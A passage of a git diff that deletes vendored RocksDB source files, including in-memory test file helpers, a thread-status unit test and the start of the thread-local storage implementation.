-
-  virtual Status Truncate(uint64_t size) override {
-    contents_.resize(static_cast<size_t>(size));
-    return Status::OK();
-  }
-  virtual Status Close() override { return Status::OK(); }
-  virtual Status Flush() override {
-    if (reader_contents_ != nullptr) {
-      assert(reader_contents_->size() <= last_flush_);
-      size_t offset = last_flush_ - reader_contents_->size();
-      *reader_contents_ = Slice(
-          contents_.data() + offset,
-          contents_.size() - offset);
-      last_flush_ = contents_.size();
-    }
-
-    return Status::OK();
-  }
-  virtual Status Sync() override { return Status::OK(); }
-  virtual Status Append(const Slice& slice) override {
-    contents_.append(slice.data(), slice.size());
-    return Status::OK();
-  }
-  void Drop(size_t bytes) {
-    if (reader_contents_ != nullptr) {
-      contents_.resize(contents_.size() - bytes);
-      *reader_contents_ = Slice(
-          reader_contents_->data(), reader_contents_->size() - bytes);
-      last_flush_ = contents_.size();
-    }
-  }
-
- private:
-  Slice* reader_contents_;
-  size_t last_flush_;
-};
-
-// A wrapper around a StringSink to give it a RandomRWFile interface
-class RandomRWStringSink : public RandomRWFile {
- public:
-  explicit RandomRWStringSink(StringSink* ss) : ss_(ss) {}
-
-  Status Write(uint64_t offset, const Slice& data) {
-    if (offset + data.size() > ss_->contents_.size()) {
-      ss_->contents_.resize(offset + data.size(), '\0');
-    }
-
-    char* pos = const_cast<char*>(ss_->contents_.data() + offset);
-    memcpy(pos, data.data(), data.size());
-    return Status::OK();
-  }
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const {
-    *result = Slice(nullptr, 0);
-    if (offset < ss_->contents_.size()) {
-      size_t str_res_sz =
-          std::min(static_cast<size_t>(ss_->contents_.size() - offset), n);
-      *result = Slice(ss_->contents_.data() + offset, str_res_sz);
-    }
-    return Status::OK();
-  }
-
-  Status Flush() { return Status::OK(); }
-
-  Status Sync() { return Status::OK(); }
-
-  Status Close() { return Status::OK(); }
-
-  const std::string& contents() const { return ss_->contents(); }
-
- private:
-  StringSink* ss_;
-};
-
-// Like StringSink, this writes into a string.  Unlink StringSink, it
-// has some initial content and overwrites it, just like a recycled
-// log file.
-class OverwritingStringSink : public WritableFile {
- public:
-  explicit OverwritingStringSink(Slice* reader_contents)
-      : WritableFile(),
-        contents_(""),
-        reader_contents_(reader_contents),
-        last_flush_(0) {}
-
-  const std::string& contents() const { return contents_; }
-
-  virtual Status Truncate(uint64_t size) override {
-    contents_.resize(static_cast<size_t>(size));
-    return Status::OK();
-  }
-  virtual Status Close() override { return Status::OK(); }
-  virtual Status Flush() override {
-    if (last_flush_ < contents_.size()) {
-      assert(reader_contents_->size() >= contents_.size());
-      memcpy((char*)reader_contents_->data() + last_flush_,
-             contents_.data() + last_flush_, contents_.size() - last_flush_);
-      last_flush_ = contents_.size();
-    }
-    return Status::OK();
-  }
-  virtual Status Sync() override { return Status::OK(); }
-  virtual Status Append(const Slice& slice) override {
-    contents_.append(slice.data(), slice.size());
-    return Status::OK();
-  }
-  void Drop(size_t bytes) {
-    contents_.resize(contents_.size() - bytes);
-    if (last_flush_ > contents_.size()) last_flush_ = contents_.size();
-  }
-
- private:
-  std::string contents_;
-  Slice* reader_contents_;
-  size_t last_flush_;
-};
-
-class StringSource: public RandomAccessFile {
- public:
-  explicit StringSource(const Slice& contents, uint64_t uniq_id = 0,
-                        bool mmap = false)
-      : contents_(contents.data(), contents.size()),
-        uniq_id_(uniq_id),
-        mmap_(mmap),
-        total_reads_(0) {}
-
-  virtual ~StringSource() { }
-
-  uint64_t Size() const { return contents_.size(); }
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-      char* scratch) const override {
-    total_reads_++;
-    if (offset > contents_.size()) {
-      return Status::InvalidArgument("invalid Read offset");
-    }
-    if (offset + n > contents_.size()) {
-      n = contents_.size() - static_cast<size_t>(offset);
-    }
-    if (!mmap_) {
-      memcpy(scratch, &contents_[static_cast<size_t>(offset)], n);
-      *result = Slice(scratch, n);
-    } else {
-      *result = Slice(&contents_[static_cast<size_t>(offset)], n);
-    }
-    return Status::OK();
-  }
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override {
-    if (max_size < 20) {
-      return 0;
-    }
-
-    char* rid = id;
-    rid = EncodeVarint64(rid, uniq_id_);
-    rid = EncodeVarint64(rid, 0);
-    return static_cast<size_t>(rid-id);
-  }
-
-  int total_reads() const { return total_reads_; }
-
-  void set_total_reads(int tr) { total_reads_ = tr; }
-
- private:
-  std::string contents_;
-  uint64_t uniq_id_;
-  bool mmap_;
-  mutable int total_reads_;
-};
-
-class NullLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {}
-  virtual size_t GetLogFileSize() const override { return 0; }
-};
-
-// Corrupts key by changing the type
-extern void CorruptKeyType(InternalKey* ikey);
-
-extern std::string KeyStr(const std::string& user_key,
-                          const SequenceNumber& seq, const ValueType& t,
-                          bool corrupt = false);
-
-class SleepingBackgroundTask {
- public:
-  SleepingBackgroundTask()
-      : bg_cv_(&mutex_),
-        should_sleep_(true),
-        done_with_sleep_(false),
-        sleeping_(false) {}
-
-  bool IsSleeping() {
-    MutexLock l(&mutex_);
-    return sleeping_;
-  }
-  void DoSleep() {
-    MutexLock l(&mutex_);
-    sleeping_ = true;
-    bg_cv_.SignalAll();
-    while (should_sleep_) {
-      bg_cv_.Wait();
-    }
-    sleeping_ = false;
-    done_with_sleep_ = true;
-    bg_cv_.SignalAll();
-  }
-  void WaitUntilSleeping() {
-    MutexLock l(&mutex_);
-    while (!sleeping_ || !should_sleep_) {
-      bg_cv_.Wait();
-    }
-  }
-  void WakeUp() {
-    MutexLock l(&mutex_);
-    should_sleep_ = false;
-    bg_cv_.SignalAll();
-  }
-  void WaitUntilDone() {
-    MutexLock l(&mutex_);
-    while (!done_with_sleep_) {
-      bg_cv_.Wait();
-    }
-  }
-  bool WokenUp() {
-    MutexLock l(&mutex_);
-    return should_sleep_ == false;
-  }
-
-  void Reset() {
-    MutexLock l(&mutex_);
-    should_sleep_ = true;
-    done_with_sleep_ = false;
-  }
-
-  static void DoSleepTask(void* arg) {
-    reinterpret_cast<SleepingBackgroundTask*>(arg)->DoSleep();
-  }
-
- private:
-  port::Mutex mutex_;
-  port::CondVar bg_cv_;  // Signalled when background work finishes
-  bool should_sleep_;
-  bool done_with_sleep_;
-  bool sleeping_;
-};
-
-// Filters merge operands and values that are equal to `num`.
-class FilterNumber : public CompactionFilter {
- public:
-  explicit FilterNumber(uint64_t num) : num_(num) {}
-
-  std::string last_merge_operand_key() { return last_merge_operand_key_; }
-
-  bool Filter(int level, const rocksdb::Slice& key, const rocksdb::Slice& value,
-              std::string* new_value, bool* value_changed) const override {
-    if (value.size() == sizeof(uint64_t)) {
-      return num_ == DecodeFixed64(value.data());
-    }
-    return true;
-  }
-
-  bool FilterMergeOperand(int level, const rocksdb::Slice& key,
-                          const rocksdb::Slice& value) const override {
-    last_merge_operand_key_ = key.ToString();
-    if (value.size() == sizeof(uint64_t)) {
-      return num_ == DecodeFixed64(value.data());
-    }
-    return true;
-  }
-
-  const char* Name() const override { return "FilterBadMergeOperand"; }
-
- private:
-  mutable std::string last_merge_operand_key_;
-  uint64_t num_;
-};
-
-inline std::string EncodeInt(uint64_t x) {
-  std::string result;
-  PutFixed64(&result, x);
-  return result;
-}
-
-class StringEnv : public EnvWrapper {
- public:
-  class SeqStringSource : public SequentialFile {
-   public:
-    explicit SeqStringSource(const std::string& data)
-        : data_(data), offset_(0) {}
-    ~SeqStringSource() {}
-    Status Read(size_t n, Slice* result, char* scratch) override {
-      std::string output;
-      if (offset_ < data_.size()) {
-        n = std::min(data_.size() - offset_, n);
-        memcpy(scratch, data_.data() + offset_, n);
-        offset_ += n;
-        *result = Slice(scratch, n);
-      } else {
-        return Status::InvalidArgument(
-            "Attemp to read when it already reached eof.");
-      }
-      return Status::OK();
-    }
-    Status Skip(uint64_t n) override {
-      if (offset_ >= data_.size()) {
-        return Status::InvalidArgument(
-            "Attemp to read when it already reached eof.");
-      }
-      // TODO(yhchiang): Currently doesn't handle the overflow case.
-      offset_ += n;
-      return Status::OK();
-    }
-
-   private:
-    std::string data_;
-    size_t offset_;
-  };
-
-  class StringSink : public WritableFile {
-   public:
-    explicit StringSink(std::string* contents)
-        : WritableFile(), contents_(contents) {}
-    virtual Status Truncate(uint64_t size) override {
-      contents_->resize(size);
-      return Status::OK();
-    }
-    virtual Status Close() override { return Status::OK(); }
-    virtual Status Flush() override { return Status::OK(); }
-    virtual Status Sync() override { return Status::OK(); }
-    virtual Status Append(const Slice& slice) override {
-      contents_->append(slice.data(), slice.size());
-      return Status::OK();
-    }
-
-   private:
-    std::string* contents_;
-  };
-
-  explicit StringEnv(Env* t) : EnvWrapper(t) {}
-  virtual ~StringEnv() {}
-
-  const std::string& GetContent(const std::string& f) { return files_[f]; }
-
-  const Status WriteToNewFile(const std::string& file_name,
-                              const std::string& content) {
-    unique_ptr<WritableFile> r;
-    auto s = NewWritableFile(file_name, &r, EnvOptions());
-    if (!s.ok()) {
-      return s;
-    }
-    r->Append(content);
-    r->Flush();
-    r->Close();
-    assert(files_[file_name] == content);
-    return Status::OK();
-  }
-
-  // The following text is boilerplate that forwards all methods to target()
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override {
-    auto iter = files_.find(f);
-    if (iter == files_.end()) {
-      return Status::NotFound("The specified file does not exist", f);
-    }
-    r->reset(new SeqStringSource(iter->second));
-    return Status::OK();
-  }
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& options) override {
-    return Status::NotSupported();
-  }
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override {
-    auto iter = files_.find(f);
-    if (iter != files_.end()) {
-      return Status::IOError("The specified file already exists", f);
-    }
-    r->reset(new StringSink(&files_[f]));
-    return Status::OK();
-  }
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    return Status::NotSupported();
-  }
-  Status FileExists(const std::string& f) override {
-    if (files_.find(f) == files_.end()) {
-      return Status::NotFound();
-    }
-    return Status::OK();
-  }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    return Status::NotSupported();
-  }
-  Status DeleteFile(const std::string& f) override {
-    files_.erase(f);
-    return Status::OK();
-  }
-  Status CreateDir(const std::string& d) override {
-    return Status::NotSupported();
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    return Status::NotSupported();
-  }
-  Status DeleteDir(const std::string& d) override {
-    return Status::NotSupported();
-  }
-  Status GetFileSize(const std::string& f, uint64_t* s) override {
-    auto iter = files_.find(f);
-    if (iter == files_.end()) {
-      return Status::NotFound("The specified file does not exist:", f);
-    }
-    *s = iter->second.size();
-    return Status::OK();
-  }
-
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override {
-    return Status::NotSupported();
-  }
-
-  Status RenameFile(const std::string& s, const std::string& t) override {
-    return Status::NotSupported();
-  }
-
-  Status LinkFile(const std::string& s, const std::string& t) override {
-    return Status::NotSupported();
-  }
-
-  Status LockFile(const std::string& f, FileLock** l) override {
-    return Status::NotSupported();
-  }
-
-  Status UnlockFile(FileLock* l) override { return Status::NotSupported(); }
-
- protected:
-  std::unordered_map<std::string, std::string> files_;
-};
-
-// Randomly initialize the given DBOptions
-void RandomInitDBOptions(DBOptions* db_opt, Random* rnd);
-
-// Randomly initialize the given ColumnFamilyOptions
-// Note that the caller is responsible for releasing non-null
-// cf_opt->compaction_filter.
-void RandomInitCFOptions(ColumnFamilyOptions* cf_opt, Random* rnd);
-
-// A dummy merge operator which can change its name
-class ChanglingMergeOperator : public MergeOperator {
- public:
-  explicit ChanglingMergeOperator(const std::string& name)
-      : name_(name + "MergeOperator") {}
-  ~ChanglingMergeOperator() {}
-
-  void SetName(const std::string& name) { name_ = name; }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    return false;
-  }
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    return false;
-  }
-  virtual const char* Name() const override { return name_.c_str(); }
-
- protected:
-  std::string name_;
-};
-
-// Returns a dummy merge operator with random name.
-MergeOperator* RandomMergeOperator(Random* rnd);
-
-// A dummy compaction filter which can change its name
-class ChanglingCompactionFilter : public CompactionFilter {
- public:
-  explicit ChanglingCompactionFilter(const std::string& name)
-      : name_(name + "CompactionFilter") {}
-  ~ChanglingCompactionFilter() {}
-
-  void SetName(const std::string& name) { name_ = name; }
-
-  bool Filter(int level, const Slice& key, const Slice& existing_value,
-              std::string* new_value, bool* value_changed) const override {
-    return false;
-  }
-
-  const char* Name() const override { return name_.c_str(); }
-
- private:
-  std::string name_;
-};
-
-// Returns a dummy compaction filter with a random name.
-CompactionFilter* RandomCompactionFilter(Random* rnd);
-
-// A dummy compaction filter factory which can change its name
-class ChanglingCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  explicit ChanglingCompactionFilterFactory(const std::string& name)
-      : name_(name + "CompactionFilterFactory") {}
-  ~ChanglingCompactionFilterFactory() {}
-
-  void SetName(const std::string& name) { name_ = name; }
-
-  std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>();
-  }
-
-  // Returns a name that identifies this compaction filter factory.
-  const char* Name() const override { return name_.c_str(); }
-
- protected:
-  std::string name_;
-};
-
-CompressionType RandomCompressionType(Random* rnd);
-
-void RandomCompressionTypeVector(const size_t count,
-                                 std::vector<CompressionType>* types,
-                                 Random* rnd);
-
-CompactionFilterFactory* RandomCompactionFilterFactory(Random* rnd);
-
-const SliceTransform* RandomSliceTransform(Random* rnd, int pre_defined = -1);
-
-TableFactory* RandomTableFactory(Random* rnd, int pre_defined = -1);
-
-std::string RandomName(Random* rnd, const size_t len);
-
-Status DestroyDir(Env* env, const std::string& dir);
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/thread_list_test.cc b/thirdparty/rocksdb/util/thread_list_test.cc
deleted file mode 100644
index 36a221b..0000000
--- a/thirdparty/rocksdb/util/thread_list_test.cc
+++ /dev/null
@@ -1,352 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <mutex>
-#include <condition_variable>
-
-#include "monitoring/thread_status_updater.h"
-#include "rocksdb/db.h"
-#include "util/testharness.h"
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-namespace rocksdb {
-
-class SimulatedBackgroundTask {
- public:
-  SimulatedBackgroundTask(
-      const void* db_key, const std::string& db_name,
-      const void* cf_key, const std::string& cf_name,
-      const ThreadStatus::OperationType operation_type =
-          ThreadStatus::OP_UNKNOWN,
-      const ThreadStatus::StateType state_type =
-          ThreadStatus::STATE_UNKNOWN)
-      : db_key_(db_key), db_name_(db_name),
-        cf_key_(cf_key), cf_name_(cf_name),
-        operation_type_(operation_type), state_type_(state_type),
-        should_run_(true), running_count_(0) {
-    Env::Default()->GetThreadStatusUpdater()->NewColumnFamilyInfo(
-        db_key_, db_name_, cf_key_, cf_name_);
-  }
-
-  ~SimulatedBackgroundTask() {
-    Env::Default()->GetThreadStatusUpdater()->EraseDatabaseInfo(db_key_);
-  }
-
-  void Run() {
-    std::unique_lock<std::mutex> l(mutex_);
-    running_count_++;
-    Env::Default()->GetThreadStatusUpdater()->SetColumnFamilyInfoKey(cf_key_);
-    Env::Default()->GetThreadStatusUpdater()->SetThreadOperation(
-        operation_type_);
-    Env::Default()->GetThreadStatusUpdater()->SetThreadState(state_type_);
-    while (should_run_) {
-      bg_cv_.wait(l);
-    }
-    Env::Default()->GetThreadStatusUpdater()->ClearThreadState();
-    Env::Default()->GetThreadStatusUpdater()->ClearThreadOperation();
-    Env::Default()->GetThreadStatusUpdater()->SetColumnFamilyInfoKey(0);
-    running_count_--;
-    bg_cv_.notify_all();
-  }
-
-  void FinishAllTasks() {
-    std::unique_lock<std::mutex> l(mutex_);
-    should_run_ = false;
-    bg_cv_.notify_all();
-  }
-
-  void WaitUntilScheduled(int job_count, Env* env) {
-    while (running_count_ < job_count) {
-      env->SleepForMicroseconds(1000);
-    }
-  }
-
-  void WaitUntilDone() {
-    std::unique_lock<std::mutex> l(mutex_);
-    while (running_count_ > 0) {
-      bg_cv_.wait(l);
-    }
-  }
-
-  static void DoSimulatedTask(void* arg) {
-    reinterpret_cast<SimulatedBackgroundTask*>(arg)->Run();
-  }
-
- private:
-  const void* db_key_;
-  const std::string db_name_;
-  const void* cf_key_;
-  const std::string cf_name_;
-  const ThreadStatus::OperationType operation_type_;
-  const ThreadStatus::StateType state_type_;
-  std::mutex mutex_;
-  std::condition_variable bg_cv_;
-  bool should_run_;
-  std::atomic<int> running_count_;
-};
-
-class ThreadListTest : public testing::Test {
- public:
-  ThreadListTest() {
-  }
-};
-
-TEST_F(ThreadListTest, GlobalTables) {
-  // verify the global tables for operations and states are properly indexed.
-  for (int type = 0; type != ThreadStatus::NUM_OP_TYPES; ++type) {
-    ASSERT_EQ(global_operation_table[type].type, type);
-    ASSERT_EQ(global_operation_table[type].name,
-              ThreadStatus::GetOperationName(
-                  ThreadStatus::OperationType(type)));
-  }
-
-  for (int type = 0; type != ThreadStatus::NUM_STATE_TYPES; ++type) {
-    ASSERT_EQ(global_state_table[type].type, type);
-    ASSERT_EQ(global_state_table[type].name,
-              ThreadStatus::GetStateName(
-                  ThreadStatus::StateType(type)));
-  }
-
-  for (int stage = 0; stage != ThreadStatus::NUM_OP_STAGES; ++stage) {
-    ASSERT_EQ(global_op_stage_table[stage].stage, stage);
-    ASSERT_EQ(global_op_stage_table[stage].name,
-              ThreadStatus::GetOperationStageName(
-                  ThreadStatus::OperationStage(stage)));
-  }
-}
-
-TEST_F(ThreadListTest, SimpleColumnFamilyInfoTest) {
-  Env* env = Env::Default();
-  const int kHighPriorityThreads = 3;
-  const int kLowPriorityThreads = 5;
-  const int kSimulatedHighPriThreads = kHighPriorityThreads - 1;
-  const int kSimulatedLowPriThreads = kLowPriorityThreads / 3;
-  env->SetBackgroundThreads(kHighPriorityThreads, Env::HIGH);
-  env->SetBackgroundThreads(kLowPriorityThreads, Env::LOW);
-
-  SimulatedBackgroundTask running_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu");
-
-  for (int test = 0; test < kSimulatedHighPriThreads; ++test) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &running_task, Env::Priority::HIGH);
-  }
-  for (int test = 0; test < kSimulatedLowPriThreads; ++test) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &running_task, Env::Priority::LOW);
-  }
-  running_task.WaitUntilScheduled(
-      kSimulatedHighPriThreads + kSimulatedLowPriThreads, env);
-
-  std::vector<ThreadStatus> thread_list;
-
-  // Verify the number of running threads in each pool.
-  env->GetThreadList(&thread_list);
-  int running_count[ThreadStatus::NUM_THREAD_TYPES] = {0};
-  for (auto thread_status : thread_list) {
-    if (thread_status.cf_name == "pikachu" &&
-        thread_status.db_name == "running") {
-      running_count[thread_status.thread_type]++;
-    }
-  }
-  ASSERT_EQ(
-      running_count[ThreadStatus::HIGH_PRIORITY],
-      kSimulatedHighPriThreads);
-  ASSERT_EQ(
-      running_count[ThreadStatus::LOW_PRIORITY],
-      kSimulatedLowPriThreads);
-  ASSERT_EQ(
-      running_count[ThreadStatus::USER], 0);
-
-  running_task.FinishAllTasks();
-  running_task.WaitUntilDone();
-
-  // Verify none of the threads are running
-  env->GetThreadList(&thread_list);
-
-  for (int i = 0; i < ThreadStatus::NUM_THREAD_TYPES; ++i) {
-    running_count[i] = 0;
-  }
-  for (auto thread_status : thread_list) {
-    if (thread_status.cf_name == "pikachu" &&
-        thread_status.db_name == "running") {
-      running_count[thread_status.thread_type]++;
-    }
-  }
-
-  ASSERT_EQ(
-      running_count[ThreadStatus::HIGH_PRIORITY], 0);
-  ASSERT_EQ(
-      running_count[ThreadStatus::LOW_PRIORITY], 0);
-  ASSERT_EQ(
-      running_count[ThreadStatus::USER], 0);
-}
-
-namespace {
-  void UpdateStatusCounts(
-      const std::vector<ThreadStatus>& thread_list,
-      int operation_counts[], int state_counts[]) {
-    for (auto thread_status : thread_list) {
-      operation_counts[thread_status.operation_type]++;
-      state_counts[thread_status.state_type]++;
-    }
-  }
-
-  void VerifyAndResetCounts(
-      const int correct_counts[], int collected_counts[], int size) {
-    for (int i = 0; i < size; ++i) {
-      ASSERT_EQ(collected_counts[i], correct_counts[i]);
-      collected_counts[i] = 0;
-    }
-  }
-
-  void UpdateCount(
-      int operation_counts[], int from_event, int to_event, int amount) {
-    operation_counts[from_event] -= amount;
-    operation_counts[to_event] += amount;
-  }
-}  // namespace
-
-TEST_F(ThreadListTest, SimpleEventTest) {
-  Env* env = Env::Default();
-
-  // simulated tasks
-  const int kFlushWriteTasks = 3;
-  SimulatedBackgroundTask flush_write_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_FLUSH);
-
-  const int kCompactionWriteTasks = 4;
-  SimulatedBackgroundTask compaction_write_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_COMPACTION);
-
-  const int kCompactionReadTasks = 5;
-  SimulatedBackgroundTask compaction_read_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_COMPACTION);
-
-  const int kCompactionWaitTasks = 6;
-  SimulatedBackgroundTask compaction_wait_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_COMPACTION);
-
-  // setup right answers
-  int correct_operation_counts[ThreadStatus::NUM_OP_TYPES] = {0};
-  correct_operation_counts[ThreadStatus::OP_FLUSH] =
-      kFlushWriteTasks;
-  correct_operation_counts[ThreadStatus::OP_COMPACTION] =
-      kCompactionWriteTasks + kCompactionReadTasks + kCompactionWaitTasks;
-
-  env->SetBackgroundThreads(
-      correct_operation_counts[ThreadStatus::OP_FLUSH], Env::HIGH);
-  env->SetBackgroundThreads(
-      correct_operation_counts[ThreadStatus::OP_COMPACTION], Env::LOW);
-
-  // schedule the simulated tasks
-  for (int t = 0; t < kFlushWriteTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &flush_write_task, Env::Priority::HIGH);
-  }
-  flush_write_task.WaitUntilScheduled(kFlushWriteTasks, env);
-
-  for (int t = 0; t < kCompactionWriteTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &compaction_write_task, Env::Priority::LOW);
-  }
-  compaction_write_task.WaitUntilScheduled(kCompactionWriteTasks, env);
-
-  for (int t = 0; t < kCompactionReadTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &compaction_read_task, Env::Priority::LOW);
-  }
-  compaction_read_task.WaitUntilScheduled(kCompactionReadTasks, env);
-
-  for (int t = 0; t < kCompactionWaitTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &compaction_wait_task, Env::Priority::LOW);
-  }
-  compaction_wait_task.WaitUntilScheduled(kCompactionWaitTasks, env);
-
-  // verify the thread-status
-  int operation_counts[ThreadStatus::NUM_OP_TYPES] = {0};
-  int state_counts[ThreadStatus::NUM_STATE_TYPES] = {0};
-
-  std::vector<ThreadStatus> thread_list;
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate compaction-wait tasks and see if the thread-status
-  // reflects this update
-  compaction_wait_task.FinishAllTasks();
-  compaction_wait_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_COMPACTION,
-              ThreadStatus::OP_UNKNOWN, kCompactionWaitTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate flush-write tasks and see if the thread-status
-  // reflects this update
-  flush_write_task.FinishAllTasks();
-  flush_write_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_FLUSH,
-              ThreadStatus::OP_UNKNOWN, kFlushWriteTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate compaction-write tasks and see if the thread-status
-  // reflects this update
-  compaction_write_task.FinishAllTasks();
-  compaction_write_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_COMPACTION,
-              ThreadStatus::OP_UNKNOWN, kCompactionWriteTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate compaction-write tasks and see if the thread-status
-  // reflects this update
-  compaction_read_task.FinishAllTasks();
-  compaction_read_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_COMPACTION,
-              ThreadStatus::OP_UNKNOWN, kCompactionReadTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return 0;
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
diff --git a/thirdparty/rocksdb/util/thread_local.cc b/thirdparty/rocksdb/util/thread_local.cc
deleted file mode 100644
index 5361951..0000000
--- a/thirdparty/rocksdb/util/thread_local.cc
+++ /dev/null
@@ -1,546 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/thread_local.h"
-#include "util/mutexlock.h"
-#include "port/likely.h"
-#include <stdlib.h>
-
-namespace rocksdb {
-
-struct Entry {
-  Entry() : ptr(nullptr) {}
-  Entry(const Entry& e) : ptr(e.ptr.load(std::memory_order_relaxed)) {}
-  std::atomic<void*> ptr;
-};
-
-class StaticMeta;
-
-// This is the structure that is declared as "thread_local" storage.
-// The vector keep list of atomic pointer for all instances for "current"
-// thread. The vector is indexed by an Id that is unique in process and
-// associated with one ThreadLocalPtr instance. The Id is assigned by a
-// global StaticMeta singleton. So if we instantiated 3 ThreadLocalPtr
-// instances, each thread will have a ThreadData with a vector of size 3:
-//     ---------------------------------------------------
-//     |          | instance 1 | instance 2 | instnace 3 |
-//     ---------------------------------------------------
-//     | thread 1 |    void*   |    void*   |    void*   | <- ThreadData
-//     ---------------------------------------------------
-//     | thread 2 |    void*   |    void*   |    void*   | <- ThreadData
-//     ---------------------------------------------------
-//     | thread 3 |    void*   |    void*   |    void*   | <- ThreadData
-//     ---------------------------------------------------
-struct ThreadData {
-  explicit ThreadData(ThreadLocalPtr::StaticMeta* _inst) : entries(), inst(_inst) {}
-  std::vector<Entry> entries;
-  ThreadData* next;
-  ThreadData* prev;
-  ThreadLocalPtr::StaticMeta* inst;
-};
-
-class ThreadLocalPtr::StaticMeta {
-public:
-  StaticMeta();
-
-  // Return the next available Id
-  uint32_t GetId();
-  // Return the next available Id without claiming it
-  uint32_t PeekId() const;
-  // Return the given Id back to the free pool. This also triggers
-  // UnrefHandler for associated pointer value (if not NULL) for all threads.
-  void ReclaimId(uint32_t id);
-
-  // Return the pointer value for the given id for the current thread.
-  void* Get(uint32_t id) const;
-  // Reset the pointer value for the given id for the current thread.
-  void Reset(uint32_t id, void* ptr);
-  // Atomically swap the supplied ptr and return the previous value
-  void* Swap(uint32_t id, void* ptr);
-  // Atomically compare and swap the provided value only if it equals
-  // to expected value.
-  bool CompareAndSwap(uint32_t id, void* ptr, void*& expected);
-  // Reset all thread local data to replacement, and return non-nullptr
-  // data for all existing threads
-  void Scrape(uint32_t id, autovector<void*>* ptrs, void* const replacement);
-  // Update res by applying func on each thread-local value. Holds a lock that
-  // prevents unref handler from running during this call, but clients must
-  // still provide external synchronization since the owning thread can
-  // access the values without internal locking, e.g., via Get() and Reset().
-  void Fold(uint32_t id, FoldFunc func, void* res);
-
-  // Register the UnrefHandler for id
-  void SetHandler(uint32_t id, UnrefHandler handler);
-
-  // protect inst, next_instance_id_, free_instance_ids_, head_,
-  // ThreadData.entries
-  //
-  // Note that here we prefer function static variable instead of the usual
-  // global static variable.  The reason is that c++ destruction order of
-  // static variables in the reverse order of their construction order.
-  // However, C++ does not guarantee any construction order when global
-  // static variables are defined in different files, while the function
